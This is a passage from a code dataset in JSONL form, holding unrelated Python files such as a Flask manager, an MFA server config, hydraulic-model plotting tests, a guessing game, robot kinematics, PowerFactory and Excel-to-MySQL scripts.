flask.ext.script import Manager, Shell\nfrom flask.ext.migrate import Migrate, MigrateCommand\n\nfrom app import create_app, db\nfrom app.models import User, Role\n\n# Create an app and set up the command line arguments to run the app as\n# a command line program.\n\napp = create_app(os.getenv('NAMEBASE_CONFIG') or 'default')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\n@manager.command\ndef test():\n # Run the unit tests.\n import unittest\n\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)\n\n\ndef make_shell_context():\n return {\n app: app,\n db: db,\n User: User,\n Role: Role,\n }\n\n\nmanager.add_command('shell', Shell(make_context=make_shell_context))\nmanager.add_command('db', MigrateCommand)\n\nif __name__ == '__main__':\n manager.run()","sub_path":"namebase.py","file_name":"namebase.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590933215","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import unicode_literals\n\n\"\"\"HTTP server settings\"\"\"\naddress = '127.0.0.1'\nport = 8011\n\n\"\"\"Set Access-Control-Allow-Origin header\"\"\"\n# allowOrigin = ['*']\n\n\"\"\"Time synchronization\n\nTo be able to perform time based verification, by default RPS syncs its time\nwith MIRACL servers. If you set it to False, you should still sync the server\nusing an accurate NTP time server!\n\"\"\"\n# syncTime = False\n\n\"\"\"\nDynamic options url\n\nLocation to be queried for dynamically (runtime) changeable options.\n'None' mean dynamic options are disabled and it is default value.\n\"\"\"\n# dynamicOptionsURL = None # Default\n\n\"\"\"The location of your keys file (relative to mpin-backend/servers/dta).\"\"\"\ncredentialsFile = '%CREDENTIALSFILE%'\n\n\"\"\"Entropy sources\n\nD-TA supports multiple ways to gather entropy random, urandom, certivox or\ncombination of those.\n\"\"\"\n# EntropySources = 'dev_urandom:100' # Default\n# EntropySources = 'certivox:100'\n# EntropySources = 'dev_urandom:60,certivox:40'\n\n\"\"\"MIRACL server secret share acquisition\n\n- dta - get server secret from MIRACL dta automatically on start\n- credentials.json - get server secret from credentials.json (key: certivox_server_secret)\n- manual - service will prompt for it\n- the secret itself\n\nYou can get your MIRACL server secret by:\n ./scripts/getServerSecretShare.py credentials.json\nwhich will output your credentials json including certivox_server_secret.\nNOTE: Don't pipe it directly to the same file - you'll lose your original\n credentials file.\nAlternatively you can copy only your certivox_server_secret value and supply it\neither manually or via config.py setting the certivoxServerSecret to the\ncorresponding value.\n\"\"\"\n# certivoxServerSecret = 'dta' # Default\n\n\"\"\"Local DTA address.\"\"\"\nDTALocalURL = 'http://127.0.0.1:8001'\n\n\"\"\"Access number options\n\n- enable access number\n- accessNumberExpireSeconds - The default time client will show the access number\n- accessNumberExtendValiditySeconds - Validity of the access number (on top of accessNumberExpireSeconds)\n- accessNumberUseCheckSum - Should access number have checksum\n\"\"\"\n# requestOTP = True\n# accessNumberExpireSeconds = 60 # Default\n# accessNumberExtendValiditySeconds = 5 # Default\n# accessNumberUseCheckSum = True # Default\n\n\"\"\"Authentication options\n\n- waitForLoginResult -For the mobile flow. Wait the browser login before showing the Done/Logout button.\n\"\"\"\nwaitForLoginResult = True\n# VerifyUserExpireSeconds = 3600 # Default\n# maxInvalidLoginAttempts = 3 # Default\n# cacheTimePermits = True #Default\n\n\"\"\"RPA options\n\n- RPAPermitUserURL - RPA Revocation endpoint\n- RegisterForwardUserHeaders - Coma separated list of headers\n - '' - do not forward headers\n - * - forward all headers\n- LogoutURL - RPA Logout url. For logout using the mobile client.\n\"\"\"\nRPAVerifyUserURL = 'http://127.0.0.1:8005/mpinVerify'\n# RPAPermitUserURL = 'http://127.0.0.1:8005/mpinPermitUser'\nRPAAuthenticateUserURL = '/mpinAuthenticate'\nRegisterForwardUserHeaders = ''\nLogoutURL = '/logout'\n\n\"\"\"PIN pad client options\"\"\"\n# Need to specify the url where the RPS is accesable like: http://
:\nrpsBaseURL = \"http://%s:%s/\" % (address, port) # URL where RPS is accesable\nrpsPrefix = 'rps' # Default\n# setDeviceName = True\n\n\"\"\"Mobile client options\"\"\"\n# mobileUseNative = True # False by default\nserviceName = \"Milagro MFA Demo\"\nserviceType = \"online\" # Default\nserviceIconUrl = \"http://example.com/icon.jpg\"\nmobileService = {\n \"name\": serviceName,\n \"url\": rpsBaseURL,\n \"rps_prefix\": rpsPrefix,\n \"logo_url\": serviceIconUrl,\n \"type\": serviceType\n }\n\n\"\"\"Key value storage options\"\"\"\nstorage = 'memory'\n\n# storage = 'redis'\n# redisHost = '127.0.0.1' # Default\n# redisPort = 6379 # Default\n# redisDB = 0 # Default\n# redisPassword = None # Default\n# redisPrefix = 'mpin' # Default\n\n# storage = 'json'\n# fileStorageLocation = './mpin_rps_storage.json'\n\n\"\"\"Debug options\"\"\"\n# logLevel = \"INFO\"\n\n\"\"\"Use NFC flag for mobile clients\"\"\"\nuseNFC = False\n","sub_path":"servers/rps/config_default.py","file_name":"config_default.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460019388","text":"import os\nimport tempfile\nfrom io import StringIO\nimport pandas as pd\nfrom swmmio.tests.data import (DATA_PATH, MODEL_FULL_FEATURES_XY, MODEL_FULL_FEATURES__NET_PATH, MODEL_A_PATH)\nimport swmmio\nfrom swmmio.graphics import swmm_graphics as sg\nfrom swmmio.utils.spatial import centroid_and_bbox_from_coords, change_crs\n\n\ndef test_draw_model():\n m = swmmio.Model(MODEL_FULL_FEATURES_XY)\n target_img_pth = os.path.join(DATA_PATH, 'test-draw-model.png')\n sg.draw_model(m, file_path=target_img_pth)\n\n assert os.path.exists(target_img_pth)\n os.remove(target_img_pth)\n\n\ndef test_draw_red_and_grey_nodes():\n m = swmmio.Model(MODEL_FULL_FEATURES__NET_PATH)\n target_img_pth = os.path.join(DATA_PATH, 'test-draw-model.png')\n nodes = m.nodes()\n nodes['draw_color'] = '#787882'\n nodes.loc[['J1', 'J2', 'J3'], 'draw_color'] = '#ff0000'\n nodes['draw_size'] = nodes['InvertElev'] * 3\n\n sg.draw_model(conduits=m.conduits(), nodes=nodes, file_path=target_img_pth)\n assert os.path.exists(target_img_pth)\n os.remove(target_img_pth)\n\n\ndef test_web_map_01():\n\n m = swmmio.Model(MODEL_A_PATH, crs=\"+init=EPSG:2817\")\n with tempfile.TemporaryDirectory() as tempdir:\n fname = os.path.join(tempdir, 'test-map.html')\n sg.create_map(m, filename=fname)\n\n assert os.path.exists(fname)\n\n\ndef test_centroid_and_bbox_from_coords():\n\n m = swmmio.Model(MODEL_A_PATH, crs=\"+init=EPSG:2817\")\n m.to_crs(\"+init=EPSG:4326\")\n\n c, bbox = centroid_and_bbox_from_coords(m.nodes.dataframe['coords'])\n assert c == (-70.97068150884797, 43.74695249578866)\n assert bbox == [-70.97068150884797, 43.74695249578866, -70.97068150884797, 43.74695249578866]\n\n c, bbox = centroid_and_bbox_from_coords([(0, 0), (0, 10), (10, 10), (10, 0)])\n assert c == (5, 5)\n assert bbox == [0, 0, 10, 10]\n\n\ndef test_change_crs():\n\n m = swmmio.Model(MODEL_A_PATH, crs=\"+init=EPSG:2817\")\n v1 = m.inp.vertices\n v2 = change_crs(m.inp.vertices, m.crs, \"+init=EPSG:4326\")\n assert v1.shape == v2.shape\n s = \"\"\"\n Name X Y \n J4-001.1 -70.959386 43.732851\n J4-001.1 -70.958415 43.732578\n J4-001.1 -70.959423 43.730452\n J2-095.1 -70.951378 43.767796\n \"\"\"\n v2_test = pd.read_csv(StringIO(s), index_col=0, delim_whitespace=True, skiprows=[0])\n assert v2.to_string() == v2_test.to_string()\n","sub_path":"swmmio/tests/test_graphics.py","file_name":"test_graphics.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"527917462","text":"import random\n\nprint('Добро пожаловать! Желаете ознакомиться с правилами игры?')\na = input('''>>> 1 - Да.\n>>> 2 - Нет.\n>>> ''')\nprint()\nif a == '1':\n print('''Добро пожаловать в наше казино!\nВашему вниманию предлагается игра \"Числовая угадайка\".\nЕё правила очень просты. Вам необходимо угадать случайное число от 1 до 100!\nУ вас будет 10 попыток.\nЧем меньше попыток вы потратите, тем больше увеличится ваша ставка.\nЕсли же вы не угадаете число, то ставка сгорает.\nВсё просто, я загадываю, ты отгадываешь!''')\nprint()\nprint('''Итак, начнём! Сколько фишек вы желаете приобрести?\n1 фишка = 100 $''')\nprint()\nn = int(input('Хочу фишек на такую сумму: '))\nprint()\nprint('Ваша сдача: ', n % 100)\nplayer_wallet = n // 100\n\ndef game(bid, wallet):\n wallet -= bid\n f = random.randint(0,1)\n i = 10\n while i > 0:\n n = int(input('Введите число: '))\n if n == f:\n print('Вы угадали число!')\n print('Ваша ставка увеличивается в', i, 'раз!!!')\n wallet += bid * i\n break\n elif f > n:\n print('Введенное число меньше, чем искомое.')\n i -= 1\n print('У вас осталось', i, 'попыток.')\n elif f < n:\n print('Введенное число больше, чем искомое.')\n i -= 1\n print('У вас осталось', i, 'попыток.')\n\n else:\n print('У вас кончились попытки, вы проиграли.')\n wallet -= bid\n\n return wallet\n\nwhile True:\n print('Ваш баланс составляет:', player_wallet)\n print()\n if player_wallet <= 0:\n print('К сожалению, ваш баланс не позволяет вам продолжить игру. Спасибо за игру!')\n break\n player_bid = int(input('Делайте вашу ставку >>> '))\n player_wallet = game(player_bid, player_wallet)\n print('Желаете продожить игру?')\n answer = int(input('''>>> 1 - Да.\n>>> 2 - Нет.\n>>> '''))\n if answer == 1:\n print('Отлично! Продолжаем!')\n continue\n else:\n print('Спасибо за игру!')\n break","sub_path":"mini_projects/Casino.py","file_name":"Casino.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"416573605","text":"# -*- coding: utf-8 -*-\nimport os\n\n\nPROJECT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n# ========== EXCEL ============\nFINALS_WORKSHEET_NAME = \"סיכומים\".decode(\"utf-8\")\n\nEXCEL_EXTENSION = \".xls\"\n\nexcel_templates_folder = r\"\\\\Back-change\\c\\Bussines Scripts\\TransferConverter2\\Excel_Templates\"\n\nexcel_destination_folder = r\"\\\\Back-change\\c\\EXCELL DAILY RECORDS\"\n\n\n# ========= MONEYGRAM TEXT =======\nSEND_FORM = \"SEND FORM\"\n\nTYPE_CANCEL = \"CANCL\"\n\nTYPE_REFUND = \"REFND\"\n\nTYPE_RECEIVE = \"RECVD\"\n\nTYPE_SEND = \"SEND\"\n\nREFUND_FORM = \"MoneyGram REFUND FORM\"\n\nRECEIVE_FORM = \"MoneyGram RECEIVE FORM\"\n\n\n# ========== FILE_TEMPLATES ============\n\nRECEIVE_FORM_CUSTOMER_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\ReceiveForm\\CustomerCopy.html')\n\nRECEIVE_FORM_AGENT_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\ReceiveForm\\AgentCopy.html')\n\nREFUND_FORM_CUSTOMER_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\RefundForm\\CustomerCopy.html')\n\nREFUND_FORM_AGENT_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\RefundForm\\AgentCopy.html')\n\nSEND_FORM_CUSTOMER_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\SendForm\\CustomerCopy.html')\n\nSEND_FORM_AGENT_TEMPLATE = os.path.join(PROJECT_DIR,r'Forms\\SendForm\\AgentCopy.html')\n\nMAIN_CSS_PATH = os.path.join(PROJECT_DIR,r'Forms\\Resources\\css\\main.css')\n\n# ======= DATES DICTIONARIES =======\nmoneygram_month_to_num_month_dict = {\n \"JAN\": \"01\",\n \"FEB\": \"02\",\n \"MAR\": \"03\",\n \"APR\": \"04\",\n \"MAY\": \"05\",\n \"JUN\": \"06\",\n \"JUL\": \"07\",\n \"AUG\": \"08\",\n \"SEP\": \"09\",\n \"OCT\": \"10\",\n \"NOV\": \"11\",\n \"DEC\": \"12\",\n}\n\nnum_month_to_moneygram_month_dict = {\n \"01\": \"Jan\",\n 1: \"Jan\",\n \"02\": \"Feb\",\n 2: \"Feb\",\n \"03\": \"Mar\",\n 3: \"Mar\",\n \"04\": \"Apr\",\n 4: \"Apr\",\n \"05\": \"May\",\n 5: \"May\",\n \"06\": \"Jun\",\n 6: \"Jun\",\n \"07\": \"Jul\",\n 7: \"Jul\",\n \"08\": \"Aug\",\n 8: \"Aug\",\n \"09\": \"Sep\",\n 9: \"Sep\",\n \"10\": \"Oct\",\n 10: \"Oct\",\n \"11\": \"Nov\",\n 11: \"Nov\",\n \"12\": \"Dec\",\n 12: \"Dec\",\n}\n\nnum_month_to_string_month_dict = {\n \"01\": \"JANUARY\",\n 1: \"JANUARY\",\n \"02\": \"FEBRUARY\",\n 2: \"FEBRUARY\",\n \"03\": \"MARCH\",\n 3: \"MARCH\",\n \"04\": \"APRIL\",\n 4: \"APRIL\",\n \"05\": \"MAY\",\n 5: \"MAY\",\n \"06\": \"JUNE\",\n 6: \"JUNE\",\n \"07\": \"JULY\",\n 7: \"JULY\",\n \"08\": \"AUGUST\",\n 8: \"AUGUST\",\n \"09\": \"SEPTEMBER\",\n 9: \"SEPTEMBER\",\n \"10\": \"OCTOBER\",\n 10: \"OCTOBER\",\n \"11\": \"NOVEMBER\",\n 11: \"NOVEMBER\",\n \"12\": \"DECEMBER\",\n 12: \"DECEMBER\"\n}\n\nnum_month_to_heb_month = {\n \"01\": \"ינואר\",\n 1: \"ינואר\",\n \"02\": \"פברואר\",\n 2: \"פברואר\",\n \"03\": \"מרץ\",\n 3: \"מרץ\",\n \"04\": \"אפריל\",\n 4: \"אפריל\",\n \"05\": \"מאי\",\n 5: \"מאי\",\n \"06\": \"יוני\",\n 6: \"יוני\",\n \"07\": \"יולי\",\n 7: \"יולי\",\n \"08\": \"אוגוסט\",\n 8: \"אוגוסט\",\n \"09\": \"ספטמבר\",\n 9: \"ספטמבר\",\n \"10\": \"אוקטובר\",\n 10: \"אוקטובר\",\n \"11\": \"נובמבר\",\n 11: \"נובמבר\",\n \"12\": \"דצמבר\",\n 12: \"דצמבר\"\n}\n\n\n# =========REGEX===========#\nsend_regex_filters = \"Sender's name([\\\\w\\\\W]*?)Address([\\\\w\\\\W]*?) \" + \\\n \"Tel. Number([\\\\w\\\\W]*?)Occupation([\\\\w\\\\W]*?)\" + \\\n \"Sender's ID([\\\\w\\\\W]*?)ID Country of issuance\" + \\\n \"([\\\\w\\\\W]*?)Date of birth([\\\\w\\\\W]*?)Destination([\\\\w\\\\W]*?)\" + \\\n \"Service Type([\\\\w\\\\W]*?)Transaction status([\\\\w\\\\W]*?)\" + \\\n \"Send currency([\\\\w\\\\W]*?)Amount Sent([\\\\w\\\\W]*?)Customer Fee([\\\\w\\\\W]*?)Discount\" + \\\n \"([\\\\w\\\\W]*?)Total collected([\\\\w\\\\W]*?)Send agent([\\\\w\\\\W]*?)\" + \\\n \"Receiver's Name([\\\\w\\\\W]*?)Receive Amount([\\\\w\\\\W]*?)\" + \\\n \"Receive Currency([\\\\w\\\\W]*?)Exchange Rate([\\\\w\\\\W]*?)\" + \\\n \"REFERENCE NUMBER([\\\\w\\\\W]*?)Declaration[\\w\\W]*?___ ([\\w\\W]*?)\" + \\\n \"For details\"\n\nsend_fields_names = ('sender_name', 'sender_address', 'sender_telephone',\n 'occupation', 'sender_id', 'nationality',\n 'date_of_birth', 'destination', 'service_type',\n 'transaction_status', 'send_currency',\n 'amount', 'fee','discount', 'total_collected',\n 'send_agent', 'receiver_name', 'receive_amount',\n 'receive_currency', 'exchange_rate', 'reference_number', 'full_date')\n\nrefund_regex_filters = \"Sender's name([\\\\w\\\\W]*?)Address([\\\\w\\\\W]*?) \" + \\\n \"Tel. Number([\\\\w\\\\W]*?)Occupation([\\\\w\\\\W]*?)\" + \\\n \"Sender's ID([\\\\w\\\\W]*?)ID Country of issuance\" + \\\n \"([\\\\w\\\\W]*?)Date of birth([\\\\w\\\\W]*?)Destination([\\\\w\\\\W]*?)\" + \\\n \"Receiver's Name([\\\\w\\\\W]*?)Send date([\\\\w\\\\W]*?)Send currency([\\\\w\\\\W]*?)\" + \\\n \"Amount Sent([\\\\w\\\\W]*?)Customer Fee([\\\\w\\\\W]*?)Total collected([\\\\w\\\\W]*?)\" + \\\n \"Send agent([\\\\w\\\\W]*?)Cancel date([\\\\w\\\\W]*?)Reason code([\\\\w\\\\W]*?)\" + \\\n \"Transaction status([\\\\w\\\\W]*?)Total refunded([\\\\w\\\\W]*?)Currency([\\\\w\\\\W]*?)\" + \\\n \"REFERENCE NUMBER([\\\\w\\\\W]*?)TERMS\"\n\nrefund_field_names = ('sender_name', 'sender_address', 'sender_telephone', 'occupation', 'sender_id', 'nationality',\n 'date_of_birth', 'destination', 'receiver_name', 'send_date', 'send_currency', 'amount', 'fee',\n 'total_collected', 'send_agent', 'cancel_date', 'reason_code', 'transaction_status',\n 'total_refunded', 'refund_currency', 'reference_number', 'full_date')\n\nreceive_regex_filters = \"REFERENCE NUMBER([\\\\w\\\\W]*?)CUSTOMER INFORMATIONRECEIVE INFORMATION\" + \\\n \"Receiver's Name([\\\\w\\\\W]*?)Address([\\\\w\\\\W]*?)Tel. Number\" + \\\n \"([\\\\w\\\\W]*?)Occupation([\\\\w\\\\W]*?)Receiver's ID([\\\\w\\\\W]*?)ID Country of issuance\" + \\\n \"([\\\\w\\\\W]*?)Date of birth([\\\\w\\\\W]*?)Sender's Name([\\\\w\\\\W]*?)\" + \\\n \"Receive country([\\\\w\\\\W]*?)Receive Agent([\\\\w\\\\W]*?)(Date[\\\\w\\\\W]*?)\" + \\\n \"Transaction status([\\\\w\\\\W]*?)Receive amount([\\\\w\\\\W]*?)Receive currency([\\\\w\\\\W]*?) This\"\n\nreceive_field_names = ('reference_number', 'receiver_name', 'address', 'Telephone_number', 'occupation', 'receiver_id',\n 'nationality', 'date_of_birth', 'sender_name', 'receive_country', 'receive_agent',\n 'receive_date', 'transaction_status', 'receive_amount', 'receive_currency', 'date')\n\n\n# ==========TESTING===========\nFILES_TEST_DIR = 'files'\n\nTESTS_DIR = 'tests'\n\nTESTING = False\n\ntesting_excel_destination_folder = os.path.join(PROJECT_DIR, TESTS_DIR, FILES_TEST_DIR)\ncurrency_sign_dict = {'USD': '$', 'EUR': '€'}","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258385356","text":"# 3 link robot \r\n#for basis function 'x2'\r\n#changed gamma is 45 degrees \r\nfrom sympy.interactive import printing \r\nprinting.init_printing(use_latex=True)\r\nimport numpy as np \r\nimport sympy as sym\r\nimport matplotlib.pyplot as plt \r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\n\r\n\r\n#ax=plt.axes(projection='3d')\r\n\r\ny1new=sym.Symbol('y1new')\r\nx1new=sym.Symbol('x1new')\r\ny2new=sym.Symbol('y2new')\r\nx2new=sym.Symbol('x2new')\r\nx3new=sym.Symbol('x3new')\r\ny3new=sym.Symbol('y3new')\r\nx2=sym.Symbol('x2')\r\nx1=sym.Symbol('x1')\r\nx3=sym.Symbol('x3')\r\ny1=sym.Symbol('y1')\r\ny2=sym.Symbol('y2')\r\ny3=sym.Symbol('y3')\r\na1=sym.Symbol('a1')\r\na2=sym.Symbol('a2')\r\na3=sym.Symbol('a3')\r\ndeltax3=sym.Symbol('deltax3')\r\ndeltay3=sym.Symbol('deltay3')\r\ntheta1=sym.Symbol('theta1')\r\ntheta2=sym.Symbol('theta2')\r\ntheta3=sym.Symbol('theta3')\r\ntheta1new=sym.Symbol('theta1new')\r\ntheta2new=sym.Symbol('theta2new')\r\ntheta3new=sym.Symbol('theta3new')\r\ngamma=sym.Symbol('gamma')\r\n\r\n#defining values\r\nl1=1\r\nl2=1\r\nl3=1\r\ngamma=0.901\r\n\r\n#finding the x positions by solving y=x^2\r\nx1=0.62\r\nx2=x1*2\r\nx3=x2*2\r\ny1=x1**2\r\ny2=x2**2\r\ny3=x3**2\r\n\r\n#now we modify the shape of the 2nd link\r\ndeltax3=0\r\ndeltax3plot=[]\r\nx3newplot=[]\r\na1_plot=[]\r\na2_plot=[]\r\na3_plot=[]\r\n\r\nfor i in range(10):\r\n deltay3=i*0.01\r\n x3new=x3-deltax3\r\n y3new=y3-deltay3\r\n x2new=x3new-l3*math.cos(gamma)\r\n y2new=y3new-l3*math.sin(gamma)\r\n print(x2new)\r\n print(y2new)\r\n print((x2new**2+y2new**2-l1**2-l2**2)/2*l1*l2)\r\n theta2new=math.acos((x2new**2+y2new**2-l1**2-l2**2)/2*l1*l2)\r\n theta1new=math.atan(y2new/x2new)-math.atan((l2*math.sin(theta2new))/l1+l2*math.cos(theta2new))\r\n theta3new=gamma-(theta1new+theta2new)\r\n x1new=l1*math.cos(theta1new)\r\n y1new=l1*math.sin(theta1new)\r\n solution=sym.solve((a1*x3new+(a2*(x3new**2))+(a3*(x3new**3))-y3new,a1*x2new+(a2*(x2new**2))+(a3*(x2new**3))-y2new,a1*x1new+(a2*(x1new**2))+(a3*(x1new**3))-y1new),(a1,a2,a3))\r\n a1_sol=solution[a1]\r\n a2_sol=solution[a2]\r\n a3_sol=solution[a3]\r\n deltax3plot.append(deltay3)\r\n a1_plot.append(a1_sol)\r\n a2_plot.append(a2_sol)\r\n a3_plot.append(a3_sol)\r\n\r\n#a1 plot\r\nfig=plt.figure()\r\nplt.plot(deltax3plot,a1_plot)\r\nplt.savefig('C:/Users/rheap/Documents/CMU/BioRobotics lab/results/3_link_x2_a1plot')\r\nplt.show()\r\n\r\n#a2 plot\r\nfig2=plt.figure()\r\nplt.plot(deltax3plot,a2_plot)\r\nplt.savefig('C:/Users/rheap/Documents/CMU/BioRobotics lab/results/3_link_x2_a2plot')\r\nplt.show()\r\n\r\n#a3 plot\r\nfig3=plt.figure()\r\nplt.plot(deltax3plot,a3_plot)\r\nplt.savefig('C:/Users/rheap/Documents/CMU/BioRobotics lab/results/3_link_x2_a3plot')\r\nplt.show()\r\n\r\n\r\n ","sub_path":"Code/3_link_x2.py","file_name":"3_link_x2.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52920752","text":"import sys\r\n# Python PowerFactory API\r\nimport powerfactory as pf\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom bokeh.plotting import figure, show, output_file\r\n\r\n# Ergon Energy Helper Functions for Logging\r\nsys.path.append(r'\\\\Ecasd01\\WksMgmt\\PowerFactory\\Scripts\\pfTextOutputs')\r\nimport pftextoutputs\r\n# Ergon Energy Helper Functions for lots of stuff, inc Ecorp ID extraction\r\nsys.path.append(r'\\\\Ecasd01\\WksMgmt\\PowerFactory\\ScriptsDEV\\pfSharedFunctions')\r\nimport pfsharedfunctions as pfsf\r\n\r\n#import CSV\r\nimport csv\r\n\r\n# Logging, A more efficient way to print\r\nimport logging\r\nlogger = logging.getLogger(__name__)\r\n\r\n# Ergon Energy Helper Functions for getting members\r\nsys.path.append(\r\n r\"\\\\Ecasd01\\WksMgmt\\PowerFactory\\ScriptsDEV\\ShortPFScripts\\PrintScripts\\PrintPFObjectMembers\"\r\n)\r\nimport printPFObjectV2_descs as printmembers\r\n \r\nimport datetime\r\nimport os\r\n\r\ndef run_main():\r\n app = pf.GetApplication()\r\n start_stuff(app)\r\n \r\ndef start_stuff(app, project=None):\r\n \"\"\"\r\n This function can be handed app and a project and do\r\n whatever is required. This allows it to be run by\r\n another script if required\r\n \"\"\"\r\n with pftextoutputs.PowerFactoryLogging(\r\n pf_app=app,\r\n add_handler=True,\r\n handler_level=logging.DEBUG,\r\n logger_to_use=logger,\r\n formatter=pftextoutputs.PFFormatter(\r\n '%(module)s: Line: %(lineno)d: %(message)s' # format for printing stuff to the console\r\n )\r\n ) as pflogger:\r\n create_voltage_diff_plot(app, project)\r\n \r\ndef create_voltage_diff_plot(app, project=None):\r\n \"\"\"\r\n In Here is where you actually start doing stuff to the model.\r\n Iterate through stuff, call other functions. Etc.\r\n \"\"\"\r\n project = app.GetActiveProject()\r\n if project is None:\r\n logger.error(\"No Active Project or passed project, Ending Script\")\r\n return\r\n\r\n main(app)\r\n current_script = app.GetCurrentScript()\r\n\r\n\r\ndef main(app):\r\n\t\r\n\tldf = app.GetFromStudyCase('ComLdf')\r\n\tsuccess = ldf.Execute() # returns a 0 on success and >1 on fail\r\n\t\r\n\t\r\n\tif success == 0:\r\n\t\tapp.PrintPlain('Name of all lines:')\r\n\t\tprint_lines(app)\r\n\t\t\r\n\t\tapp.PrintPlain('Length of L3-4:')\r\n\t\tprint_line1(app)\r\n\t\t\r\n\t\tapp.PrintPlain('Changing the length of L3-4:')\r\n\t\tmodify_length(app)\r\n\t\r\n\t\r\ndef print_lines(app):\r\n\t'''\r\n\tPrint all the lines in the project\r\n\t'''\r\n\tlines = app.GetCalcRelevantObjects('*.ElmLne')\r\n\tfor line in lines:\r\n\t\tapp.PrintPlain(line.loc_name)\r\n\tapp.PrintPlain('\\n')\r\n\t\t\r\ndef modify_length(app):\r\n\t'''\r\n\tchange the length of a given line\r\n\t'''\r\n\tmodify_line = 'L3-4'\r\n\tnew_length = 5\r\n\tAllObj = app.GetCalcRelevantObjects()\r\n\ttry:\r\n\t\tlines = app.GetCalcRelevantObjects(modify_line + '.ElmLne')\r\n\t\tline = lines[0] # get the first line in a list of lines named 'L3-4'\r\n\t\told_length = line.dline\r\n\t\tline.dline = new_length\r\n\t\tapp.PrintPlain('Length of {} has been changed from {} to {}'.format(line.loc_name, old_length, line.dline))\r\n\texcept IndexError:\r\n\t\tapp.PrintPlain('couldnt find line')\r\n\t\r\n\t\r\ndef print_line1(app):\r\n\t'''\r\n\tprint the first line\r\n\t'''\r\n\tfirst_line = 'L3-4'\r\n\tAllObj = app.GetCalcRelevantObjects()\r\n\tline = app.GetCalcRelevantObjects(first_line + '.ElmLne')\r\n\ttry:\r\n\t\tapp.PrintPlain('{}km'.format(line[0].dline))\r\n\texcept IndexError:\r\n\t\tapp.PrintPlain('couldnt find line\\n')\r\n\r\n\t\t\r\nif __name__ == '__main__':\r\n run_main()\r\n","sub_path":"accessing_network_objects.py","file_name":"accessing_network_objects.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"25516409","text":"import random\r\n\r\n\r\n# Генератор вычленения полей из массива словарей\r\n# Пример:\r\n# goods = [\r\n# {'title': 'Ковер', 'price': 2000, 'color': 'green'},\r\n# {'title': 'Диван для отдыха', 'price': 5300, 'color': 'black'}\r\n# ]\r\n# field(goods, 'title') должен выдавать 'Ковер', 'Диван для отдыха'\r\n# field(goods, 'title', 'price') должен выдавать {'title': 'Ковер', 'price': 2000}, {'title': 'Диван для отдыха', 'price': 5300}\r\n\r\ndef field(items, *args):\r\n assert len(args) > 0\r\n l = len(args)\r\n # Необходимо реализовать генератор\r\n for i in items:\r\n #print(type(i))\r\n b = dict()\r\n for k, v in i.items():\r\n if v is not None:\r\n if k in args:\r\n if l == 1:\r\n b = v\r\n else:\r\n b[k] = v\r\n else:\r\n continue\r\n if b:\r\n yield b\r\n\r\n# Генератор списка случайных чисел\r\n# Пример:\r\n# gen_random(1, 3, 5) должен выдать примерно 2, 2, 3, 2, 1\r\n# Hint: реализация занимает 2 строки\r\ndef gen_random(begin, end, num_count):\r\n for i in range(num_count):\r\n yield random.randint(begin, end)\r\n","sub_path":"Lab3/librip/gens.py","file_name":"gens.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345563310","text":"import xlrd\r\nimport pymysql\r\ndef update(sql,parame):\r\n con = pymysql.connect(host='localhost', user='root', password='1234', database='excel_to_db')\r\n couser = con.cursor()\r\n couser.execute(sql,parame)\r\n con.commit()\r\n couser.close()\r\n con.close()\r\ndef create_table(bookname,page):\r\n wb = xlrd.open_workbook(bookname)\r\n for i in range(page):\r\n wb_view = wb.sheet_by_index(i)\r\n cols = wb_view.ncols\r\n print(i+1,'月',cols)\r\n update('create table %s月的销售情况 (`%s` varchar (20))',(i+1,wb_view.cell_value(0,0)))\r\n for j in range(1,cols):\r\n print('shangmian',j)\r\n update('alter table %s月的销售情况 add `%s`varchar (20)',(i+1,wb_view.cell_value(0,j)))\r\n print('xiamian',j)\r\n\r\ncreate_table('2020年每个月的销售情况.xlsx',12)\r\ndef excel_to_db(bookname,page):\r\n wb = xlrd.open_workbook(bookname)\r\n for i in range(page):\r\n wb_view = wb.sheet_by_index(i)\r\n rows = wb_view.nrows\r\n cols = wb_view.ncols\r\n for j in range(1,rows):\r\n prame = [i + 1]\r\n for k in range(cols):\r\n prame.append(wb_view.cell_value(j,k))\r\n print(prame)\r\n update('insert into %s月的销售情况 values 